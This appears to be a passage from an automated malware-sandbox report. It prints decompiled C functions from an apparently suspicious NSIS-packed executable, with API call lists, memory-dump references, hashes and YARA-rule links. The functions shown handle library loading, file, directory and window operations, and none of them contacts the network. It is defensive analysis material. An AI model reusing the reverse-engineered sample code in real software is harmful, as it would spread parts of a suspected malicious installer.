                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-920785427
                                                                                            • Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                            • Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
                                                                                            • Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
                                                                                            • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 60%
                                                                                            			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                            0x00401f84
                                                                                            0x00401f84
                                                                                            0x00401f89
                                                                                            0x00401f90
                                                                                            0x0040204c
                                                                                            0x00402197
                                                                                            0x00402197
                                                                                            0x004028be
                                                                                            0x004028c1
                                                                                            0x004028cd
                                                                                            0x004028cd
                                                                                            0x00401f9f
                                                                                            0x00401fa9
                                                                                            0x00401fac
                                                                                            0x00401fbb
                                                                                            0x00401fbf
                                                                                            0x00401fc5
                                                                                            0x00401fc9
                                                                                            0x00402045
                                                                                            0x00000000
                                                                                            0x00402045
                                                                                            0x00401fcb
                                                                                            0x00401fd5
                                                                                            0x00401fd9
                                                                                            0x0040201d
                                                                                            0x00401fdb
                                                                                            0x00401fde
                                                                                            0x00401fe1
                                                                                            0x00402011
                                                                                            0x00401fe3
                                                                                            0x00401fe6
                                                                                            0x00401fef
                                                                                            0x00401ff1
                                                                                            0x00401ff1
                                                                                            0x00401fef
                                                                                            0x00401fe1
                                                                                            0x00402025
                                                                                            0x0040203a
                                                                                            0x0040203a
                                                                                            0x00000000
                                                                                            0x00402025
                                                                                            0x00401faf
                                                                                            0x00401fb5
                                                                                            0x00401fb9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                              • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,74E5EA30), ref: 00404F0F
                                                                                              • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2987980305-0
                                                                                            • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                            • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
                                                                                            • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
                                                                                            • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28);
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\hardz\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                            0x004015b3
                                                                                            0x004015ba
                                                                                            0x004015bd
                                                                                            0x004015c2
                                                                                            0x004015c6
                                                                                            0x004015c8
                                                                                            0x004015d0
                                                                                            0x004015d2
                                                                                            0x004015d4
                                                                                            0x004015d8
                                                                                            0x004015db
                                                                                            0x004015f3
                                                                                            0x004015f4
                                                                                            0x004015dd
                                                                                            0x004015dd
                                                                                            0x004015e0
                                                                                            0x00000000
                                                                                            0x004015eb
                                                                                            0x004015ec
                                                                                            0x004015ec
                                                                                            0x004015e0
                                                                                            0x004015fb
                                                                                            0x00401602
                                                                                            0x0040160f
                                                                                            0x0040160f
                                                                                            0x00401604
                                                                                            0x00401605
                                                                                            0x0040160d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040160d
                                                                                            0x00401602
                                                                                            0x00401612
                                                                                            0x00401615
                                                                                            0x00401617
                                                                                            0x00401618
                                                                                            0x004015c8
                                                                                            0x0040161f
                                                                                            0x0040164a
                                                                                            0x00402197
                                                                                            0x00401621
                                                                                            0x00401623
                                                                                            0x0040162e
                                                                                            0x00401634
                                                                                            0x0040163c
                                                                                            0x00401642
                                                                                            0x00401642
                                                                                            0x0040163c
                                                                                            0x004028c1
                                                                                            0x004028cd

                                                                                            APIs
                                                                                              • Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
                                                                                              • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                                                                                              • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                              • Part of subcall function 00405375: CreateDirectoryA.KERNEL32(?,?,00000000), ref: 004053B8
                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 1892508949-501415292
                                                                                            • Opcode ID: da97debdf58100be60cdcc9efb786281409cc291590135782a9c1bd18574bddb
                                                                                            • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
                                                                                            • Opcode Fuzzy Hash: da97debdf58100be60cdcc9efb786281409cc291590135782a9c1bd18574bddb
                                                                                            • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 69%
                                                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x6dce3c
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}












                                                                                            0x0040138a
                                                                                            0x004013fa
                                                                                            0x00401392
                                                                                            0x0040139b
                                                                                            0x004013a0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004013a2
                                                                                            0x004013a3
                                                                                            0x004013ad
                                                                                            0x00000000
                                                                                            0x00401404
                                                                                            0x004013b0
                                                                                            0x004013b7
                                                                                            0x004013bd
                                                                                            0x004013be
                                                                                            0x004013c0
                                                                                            0x004013c2
                                                                                            0x004013b9
                                                                                            0x004013b9
                                                                                            0x004013ba
                                                                                            0x004013ba
                                                                                            0x004013c9
                                                                                            0x004013cb
                                                                                            0x004013f4
                                                                                            0x004013f4
                                                                                            0x004013c9
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                            • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
                                                                                            • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
                                                                                            • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                            0x00405f5f
                                                                                            0x00405f62
                                                                                            0x00405f69
                                                                                            0x00405f71
                                                                                            0x00405f7d
                                                                                            0x00000000
                                                                                            0x00405f84
                                                                                            0x00405f74
                                                                                            0x00405f7b
                                                                                            0x00000000
                                                                                            0x00405f8c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                              • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                              • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                                                                                              • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 2547128583-0
                                                                                            • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                            • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
                                                                                            • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                            • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                            0x004058a2
                                                                                            0x004058af
                                                                                            0x004058c4
                                                                                            0x004058ca

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Program Files (x86)\Gw4n\5jsdph8p9l_r.exe,80000000,00000003), ref: 004058A2
                                                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCreate
                                                                                            • String ID:
                                                                                            • API String ID: 415043291-0
                                                                                            • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                            • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                            • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                            • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040587F, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040587F(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                                                                                            0x00405883
                                                                                            0x0040588c
                                                                                            0x00405895
                                                                                            0x00000000
                                                                                            0x00405895
                                                                                            0x0040589b

                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
                                                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405895
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                            • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
                                                                                            • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                            • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004053F2, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004053F2(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                            0x004053f8
                                                                                            0x00405400
                                                                                            0x00000000
                                                                                            0x00405406
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
                                                                                            • GetLastError.KERNEL32 ref: 00405406
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                            • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
                                                                                            • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                            • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004030B0, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004030B0(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                            0x004030b4
                                                                                            0x004030c7
                                                                                            0x004030cf
                                                                                            0x00000000
                                                                                            0x004030d6
                                                                                            0x00000000
                                                                                            0x004030d8

                                                                                            APIs
                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDD,000000FF,00000004,00000000,00000000,00000000), ref: 004030C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                            • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
                                                                                            • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                            • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004030E2, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E004030E2(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                            0x004030f0
                                                                                            0x004030f6

                                                                                            APIs
                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
